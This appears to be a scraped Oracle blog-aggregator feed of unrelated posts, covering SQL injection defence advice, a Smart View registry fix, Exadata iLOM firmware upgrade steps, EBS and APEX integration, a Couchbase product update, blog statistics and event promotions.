My response to that is - the application layer should definitely be aware of SQL Injection and use secure coding practices which would include:always use a bind variable unless you have an excellent technical reason not to - and then you must submit your code for review to at least five people who do not like you - they must be motivated to rip your code apart, critically review it, make fun of it - so they find the bugs.However - we need to also employ defense in depth - for when the inevitable bug slips through. When I next write about this - I'll be going over the Oracle Database Firewall - a tool that can provide at least one more layer of defense.
The last question on this topic was:
• What is the dbms_assert PL/SQL package? How does it help prevent SQL injection? Should my organization be using it?
For that - I'll just forward you onto an excellent paper on this subject written by Bryn Llewellyn. You can find that paper here.
Big Data...
Big Data Essentials: What You Need to Know, February 16th, 10:00 am – 1:30 pm PT
Big data is big news these days. But you don’t base IT investment decisions on magazine headlines.
Join us for the Big Data Online Forum to learn the essentials of big data—from the technology underlying it to real-world use cases. Oracle’s Tom Kyte, Cloudera CEO Mike Olson, and other industry thought leaders will be on hand to explain how big data can deliver revolutionary insight and competitive advantage.
You’ll get answers to tough questions surrounding big data, including:
- What business insight can big data uncover?
- How do you manage big data?
- How do you integrate big data into decision-making?
Register today for this half-day online event featuring live Q&A with big data experts.
www.oracle.com/goto/bigdata
Smart View Dialog Positions
The problem occurs when you have multiple monitors hooked up to your computer, open Smart View, connect to an Essbase database, open the Member Selection dialog and then move it onto your second monitor. Smart View remembers where you moved the dialog and will display it there the next time you open the dialog. The problem is, if you no longer have your second monitor attached, the dialog will display off-screen.
I took a look at the registry and found there is a DialogPositions setting in the registry under HKEY_CURRENT_USER\Software\Hyperion Solutions\HyperionSmartView\Options.
I found that you can close Excel/Smart View, delete the DialogPositions parameter from the registry, and restart Excel and the Member Select dialog will again be displayed centered on the main monitor.
You can make this easier for end users by creating a registration entries file. On my machine, I created a text file and named it ResetSmartViewDialogs.reg. In this file, I added the following lines:
REGEDIT4
[HKEY_CURRENT_USER\Software\Hyperion Solutions\HyperionSmartView\Options]
"DialogPositions"=-
To run the file, just double-click on it and you will be warned about the changes to be made to the registry. Simply confirm that you want the entries to be made and the offending DialogPositions setting will be removed.
Viewing Figures
It’s time for another landmark. The blog has just hit 2,500,000 views (taking three weeks less than the previous half million increment) – here’s a little breakdown on the numbers.
First the top five across the lifetime of the blog:
AWR / Statspack menu 40,714 Updated from time to time NOT IN 33,983 Feb 2007 Cartesian Merge Join 29,633 Dec 2006 dbms_xplan in 10g 28,831 Dec 2006 SQL Profiles (10g) 21,227 Feb 2007If we look at just the last year, the top five are:
AWR / Statspack menu 18,782 Updated from time to time NOT IN 8,916 Feb 2007 dbms_xplan in 10g 6,212 Dec 2006 Oracle Core 6,181 Dec 2011 Analysing Statspack (1) 5,924 Nov 2006The Cartesian Merge Join has finally been pushed off the top 5 in recent history, but perhaps that’s only a temporary effect while the Addenda to Oracle Core is still fresh in people’s minds. It’s interesting to see how many old articles are still popular reading, though.
The other statistic of note is the number of followers the blog has, currently: 828
While we’re looking at numbers and success stories for the 12 months – the UKOUG annual conference reviews have just come in, and one of mine managed to score 5.83 out of 6 for “Presentation Skills” and 5.65 for content – with one commentator saying:
“Jonathan Lewis is a legend in Oracle circles and now, after my first session with him as speaker, I know why! This was a really well-thought out talk with loads of great ideas and info. My only criticism is that I’d like to attend it again to pick up the bits I missed the first time!”
Don’t worry – it was the one about “Beating the Oracle Optimizer”, 60 minutes featuring seven different strategies for optimising a two-table join, and I’ll be presenting it at least a couple more times in the UK (probably 27th March and 13th June in Manchester and Linlithgow).
I also won two the of UKOUG’s “Inspiring Presenter” awards this year. Not sure I’ll be able to do that again next year since Connor McDonald was in town this year – if you ever get a chance to hear him, make sure you don’t miss it.
7 Best Practices of Web Experience Management
Today's guest post is from Alakh Verma, Director of Platform
Technology Solutions at Oracle.
~~~~~~~~~~~~~~~
7 Best Practices of Web Experience Management
Alakh Verma, Director, Platform Technology Solutions, Oracle
In my recent blog posts, I shared insights on personalization andpersonalized care that plays significant role in offering pleasant user experience (Personalization: A Key Tenet of User Engagement) and then on importance of Portal and Content (If Content is the King, then Portal is the Queen). In this post, my efforts are to identify and summarize some of the best practices of Web Experience Management(WEM) to create delightful customer experience based on the recent research report by CITO Research.
This
report is available here:
Create a Successful and Meaningful Customer Experience on the Web
The immense success and proliferation of Facebook, Twitter, LinkedIn, Foursquare and mobile/smart devices such as iPhones, Blackberry and Tablet PC among consumers has created consumerization of IT and new paradigm shift seeking pleasant web experience. Now, consumers have become more powerful than before with access of information and social media to communicate to the world at the fingertip.
1) Social Computing
and Use of Social Media– is changing the way people interact with each other
and with companies online. A recent
report from Comscore showed that two-thirds of shoppers begin their process
online, and the most frequent starting point is the retail site itself. These
consumers are engaging, connecting and collaborating. They want to understand
what their friends liked, what other options are available, and what people
like them ultimately bought. Most of these consumers consider Facebook
recommendations when making decisions about purchasing.
Jeff Bullas in his recent blog writes about Best Buy
successful implementation of social media that energized its employees and
customers (How Best Buy energized employees and
customers with social media)
2) Consistent Experience Across Multiple Channels and Devices – have offered Customers many choices of accessing the Web in new, engaging and
collaborative ways than before and they want that ease and diversity to be
reflected in their dealings with businesses as well. Consumers change channels
and switch devices whenever they need to. They can keep tabs on friends and
family on Facebook and follow the Twitter regularly. They can find a nearby restaurant
with foursquare geolocation on their phone and then look up reviews of that
restaurant on Yelp.
With changing
consumer patterns and behavior, it is extremely important to offer targeted,
personalized, relevant and consistent experiences across these channels and
devices.
3) Mobility-Smart
Devices and Tablets – We have witnessed a smart revolution of the
mobile space. As per the recent statistics report, the number of mobile devices
has increased fivefold from 1 billion to 5 billion, with a resulting escalation
in the number of connected people from 400 million to over 2 billion. This
unprecedented growth of connectivity is creating an overwhelming range of new
possibilities, and tapping, swiping, locating, pinging and socializing are
quickly becoming part of normal human behavior. Technology is starting to
change people and these people, whether consumers or employees, will change businesses.
As per recent report by research firm IDC, mobile usage will surpass that of
PCs and other wired devices by 2015. Mobile data traffic is expected to
increase 26-fold between 2010 and 2015. In this rapid shift, mobility has to be
the integral part of the solutions and the framework.
4) Real Time Decisions and Social Analytics – The recent technology such as big data analytics helps and supports us with
right information, real-time event messaging provides at right time, mobility
at right place anywhere and social media in the right context to make right decisions.
I have shared my insights on my earlier post on how critical are Real Time
decisions in business today? http://t.co/H6Yf0J9k
5) Personalized Experiences – In the connected
business environment, consumers expect companies to know about them and their
likes and dislikes. For a compelling and relevant experience across channels,
companies need to target, analyze, and optimize the customer experience. I had discussed and shared insights
on this personalized experience in my earlier post (Personalization:
A Key Tenet of User Engagement)
6) Multiple Stakeholders Need Control – Expectations for system usability and manageability have changed manifold. Marketers and line of-business executives require that managing websites be extremely easy to manage their campaign and relevant content to meet the timely execution Nontechnical users need to be empowered to build websites, design the layout, make content changes, set up targeting rules, control user-generated-content, and enable the mobile web, all from an intuitive and easy-to-use interface. (Oracle WebCenter Sites based on FatWire acquisition enables this seamlessly.)
7) Integrated Campaign to Drive Customers – In order to create
a compelling web experience for customers, we need the ability to organize and
access their enterprise data and leverage it in web interactions. We need a technology
platform that helps create an integrated campaign to encourage repeat business
suiting consumer lifestyle either at work or on the road on an iPhone or
visiting a physical store or calling customer service.
Oracle WebCenter is one of the leading technology platforms that offers comprehensive web experience management capabilities such as targeting and optimizing content, social computing, and multichannel engagement—all of which help improve customer loyalty, drive web traffic, and target new customer segments. In one integrated suite, it combines an array of complementary capabilities: web experience management (Oracle WebCenter Sites), composite applications and mashups (Oracle WebCenter Portal), social networking and collaboration (Oracle WebCenter Social), and enterprise content management (Oracle WebCenter Content).
E-Business Suite and APEX integration (overview)
For me there are two main use cases to integrate Oracle E-Business Suite (EBS) with Oracle Application Express (APEX):- In my APEX application I want to include/integrate data that exist in EBS
e.g. I want to include my employees that are in EBS HR - The EBS application needs to be customised and I use APEX to do that
e.g. I want to show a calendar with the birthdays of my employees
or I want a chart about the different age categories in my company
or I want to bulk update some information and there is no screen to do that
In both cases you want things to go seamlessly, you shouldn't be aware that you go from one technology to another. APEX and EBS data are in the Oracle database, so accessing data is not a big issue. Updating data in EBS you need to be careful with, as directly updating data through tables is not allowed (supported).
When I was reviewing ways to retrieve data from EBS and create/update/delete data in EBS from APEX I found a couple of methods that are interesting to explore further:
Retrieve data from EBSUpdate data in EBS1. ViewsX2. APIsXX3. OITs (Open Interface Tables)
X4. Webservices (incl. BPEL/SOA)XX
There are other ways to integrate or interface with EBS e.g. through EDI (Electronic Data Interchange) and EAI (Enterprise Application Integration), but from an APEX perspective the above four seemed to me the most interesting ones to explore further. In my next posts I will dig into integrating APEX and EBS with the above techniques.
References to interesting readings:
- Oracle Integration Repository
- Oracle Release 12.1 Documentation Library (see Integration)
- Oracle Apps Epicenter Blog
Previous related posts:
Google Connect is dead, long live the Google+ badge…
The Google Friend Connect badge I’ve been displaying on my website homepage and this blog is no more. Google have canned that widget. Instead it’s been replaced by a Google+ badge. Unfortunately, the G+ badges currently only support Google+ pages, so I can’t connect it to my regular G+ profile, only the ORACLE-BASE.com G+ page. Not ideal, but that’s the way it goes.
Currently, the G+ badge options are not particularly WordPress widget friendly. Even the small option is a bit wider than the width of the sidebar on my blog theme.
I’m not planning on double-posting, so feel free to connect to both profiles if you like. You won’t get everything twice. For the time being, my regular G+ profile is what I’ll be using and the ORACLE-BASE.com G+ page is really only present to support the badge for those people who like to show the site some love.
Cheers
Tim…
Upgrading/Downgrading Exadata iLOM firmware
This post is not really Exadata specific, really it applies to any use of the Sun X4170 series of hardwre. And it definitely seems a long way from being a traditional DBA task. As I’ve had to perform this task a number of times recently I thought I’d document it here.
There are actually a number of ways of doing it, but finding and navigating the documentation can be challenging. The way I have performed and iLOM upgrade (or downgrade) has been to use the web interface. It can be done via the command line, but the web interface has worked well for me.
The software for the iLOM can be found in the software distribution, but you have to do some digging as it is contained within the dbw.tbz tar ball, which itself is found in the image_version.tbz file which is under the db_patch_version directory. What you need is something of the form:
[root@db01] tar xvf 11.2.2.4.2.111221.tbz opt/oracle.cellos/iso/cellbits/dbfw.tbz [root@db01] tar xvf dbfw.tbz ActualFirmwareFiles/ILOM-3_0_9_19_e_r66106-Sun_Fire_X4170_X4270_X4275.pkg
This extracts just your iLOM pkg file.
So with your .pkg to hand, fire your web browser at the iLOM you want to upgrade and then choose Maintenance:
Obviously you click the upgrade Firmware Upgrade tab and then the Enter Upgrade Mode:
You now choose your iLOM pkg file and press the Upload button. This takes you to the following type of screen:
Where you can see you current version and what version you are going to upgrade/downgrade to. Once you hit the Start Upgrade button You are taken to a screen that shows the progress of the loading of the new firmware.
All very straightforward.
However, Oracle advise to follow MOS: 1327022.1 which has the following command line steps:
Check the pkg file is the version you want:
# cd /opt/oracle.cellos/iso/cellbits # tar -tf dbfw.tbz
Now Check your current Firmware version:
# /opt/oracle.cellos/CheckHWnFWProfile -d [SystemModel] SUN FIRE X4170 SERVER [BIOSVendor] American Megatrends Inc. [BIOSVersion] 07060232 [BIOSDate] 07/25/2011 [ProcessorInformation] Cores:16 Intel(R) Xeon(R) E5540 2.53GHz [ILOMVersion] 3.0.9.19.e r66106 [PhysicalMemoryGB] 72 [DiskControllerPCIeSlotNumber] PCI-E Slot 0 [DiskControllerModel] LSI MegaRAID SAS 9261-8i [DiskControllerFirmwareRevision] 12.12.0-0048 [InfinibandHCAPCIeSlotNumber] PCI-E Slot 2 [InfinibandHCAPCIeSlotWidth] x8 [InfinibandHCADeviceID] 26428 [InfinibandHCAChipRevision] A0 [InfinibandHCAImageType] ConnectX [InfinibandHCAFirmwareVersion] 2.7.0 [SASBackplaneFirmwareVersion] NotApplicable [DiskControllerPCIeSlotWidth] x8 [InfinibandHCAHardwareRev] 50 [LightsOutFirmwareVersion] Firmware Revision : 3.0 [Powersupplies] PS0 and PS1 ok [Enclosure:Slot:DiskType:DiskMake:DiskModel:MinFwVersion] ALL:ALL SAS HITACHI H103014SCSUN146G A2A8
The above output is from a V2 running 11.2.2.4.2.
Finally you can upgrade the firmware with the following:
# /opt/oracle.cellos/CheckHWnFWProfile -U /opt/oracle.cellos/iso/cellbits
After this is complete, check your version again. The iLOM upgrades seem straightforward and in isolation I’ve not encountered any issues with them. However during upgrades the iLOM is also upgraded automatically, and I have encountered issues with this – but that is for another blog entry!
Oracle Apex Mobile App
Features include:
1.Hourly calls to Yahoo Weather API
2.Static Google map API call to show the island on the map
3.More than 1 year daily temperature records to compare with current temperature, per island o. Google charts API
4.Learn the locations of 100+ Greek islands on the map
I am thinking of enriching the database behind this app with other relevant info.
To reach the app point your iPhone to URL below:
http://apex-outsource.com/pls/apex/f?p=533:greekisland
Comments are welcome!
Location:London UK
Couchbase update
I checked in with James Phillips for a Couchbase update, and I understand better what’s going on. In particular:
- Give or take minor tweaks, what I wrote in my August, 2010 Couchbase updates still applies.
- Couchbase now and for the foreseeable future has one product line, called Couchbase.
- Couchbase 2.0, the first version of Couchbase (the product) to use CouchDB for persistence, has slipped …
- … because more parts of CouchDB had to be rewritten for performance than Couchbase (the company) had hoped.
- Think mid-year or so for the release of Couchbase 2.0, hopefully sooner.
- In connection with the need to rewrite parts of CouchDB, Couchbase has:
- Gotten out of the single-server CouchDB business.
- Donated its proprietary single-sever CouchDB intellectual property to the Apache Foundation.
- The 150ish new customers in 2011 Couchbase brags about are real, subscription customers.
- Couchbase has 60ish people, headed to >100 over the next few months.
If you previously heard the brand names Couchbase Single or Couchbase Mobile, pay no further attention to them. Couchbase Single was CouchDB; Couchbase Mobile is part of Couchbase’s feature set.
The current product is Couchbase 1.8, which is a whole lot like what previously was called Membase. New features in Couchbase 1.8 (versus prior versions of Membase) were concentrated in client libraries/SDK (Software Development Kit). Not coincidentally, Couchbase has hired developer evangelists who are in charge of making Couchbase play nicely with various specific languages (e.g. C/C++)
Drilling down further into the CouchDB part of the story:
- Couchbase 2.0 will replace Couchbase 1.8/Membase’s SQLite back-end with CouchDB.
- Parts of CouchDB that do things like read, write, or compact data have been rewritten from Erlang to C.
- Couchbase still uses other Erlang parts of Apache CouchDB, and would be delighted if the community were to usefully enhance them.
- Couchbase’s heavy contributions to development of open source CouchDB will, for the most part, continue.
- CouchDB stuff donated to the Apache Foundation includes:
- Documentation
- Packaging
- Performance enhancements
There’s at least one Couchbase user with >1000 nodes (at a guess, Zynga). More typical might be 20 nodes or less. This led me to wonder how much data one puts on a Couchbase node anyway. The answer turns out to vary widely, in that you want your working set to be in RAM, and whether that’s your entire database or just a slice of it depends on the nature of the application.
James echoed a trend I’ve heard elsewhere as well, in which products one things of as being internet-specific are also sold in a few cases to conventional enterprises for — you guessed it! — their internet operations. I also asked him about competition, and he asserted:
- MongoDB is the big competition. He believes Couchbase has an excellent win rate vs. 10gen for actual paying accounts.
- DataStax/Cassandra wins over Couchbase only when multi-data-center capability is important. Naturally, multi-data-center capability is planned for Couchbase. (Indeed, that’s one of the benefits of swapping in CouchDB at the back end.)
- Redis has “dropped off the radar”, presumably because there’s no particular persistence strategy for it.
- Riak doesn’t show up much.
Thanks Google Adsense! Sponsors Wanted!
This blog is a not-for-profit exercise and I hope to pay back the amount I received from Google in the form of Oracle Certification Exam Vouchers for a lucky reader or two. Greatly appreciate the Pay Per Click (PPC) spend of Google advertisers on my blog.On a related note, the blog author invites sponsors to display their ads on the blog in return for sponsorship of exam vouchers to our loyal readers. Corporations interested in sponsorship may e-mail OCP Advisor at ocp.advisor@gmail.com
